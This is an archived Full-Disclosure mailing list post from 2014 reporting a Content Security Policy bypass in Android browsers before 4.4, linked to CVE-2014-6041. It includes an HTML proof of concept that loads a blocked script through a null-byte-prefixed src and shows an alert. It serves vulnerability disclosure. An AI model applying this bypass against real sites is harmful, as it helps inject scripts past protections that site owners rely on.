| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CA+wDdVbxxpYdQKOz0C77t+8oEj4kfhQ9kCmaOkOszpHCJUW3JQ@mail.gmail.com>
Date: Sat, 11 Oct 2014 16:09:51 -0400
From: E Boogie <evanjjohns@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CSP Bypass on Android prior to 4.4
I've found a Content Security Policy bypass similar and related to the
same origin policy bypass in CVE-2014-6041.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6041
I've tested this on an Android 4.3 tablet running a bunch of different
browsers, including Inbrowser, Firefox, and the default Android
browser on an emulator for Android 4.3.1.
HTML PoC:
<input type=button value="test" onclick="
a=document.createElement('script');
a.id='AA';
a.src='\u0000https://js.stripe.com/v2/';
document.body.appendChild(a);
setTimeout(function(){if(typeof(document.getElementById('AA'))!=='undefined'){alert(Stripe);}else{
alert(2);}}, 400);
return false;">
The content security policy rule that should block this is
script-src 'self' https://js.stripe.com/v3/ ;
The PoC worked if you see a popup containing stripes e(){} object. I
set the Timeout kind of short, so you may have to press the button
twice before you see the popup.
I have a PoC test page at ejj.io/test.php
Cheers,
Evan J
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists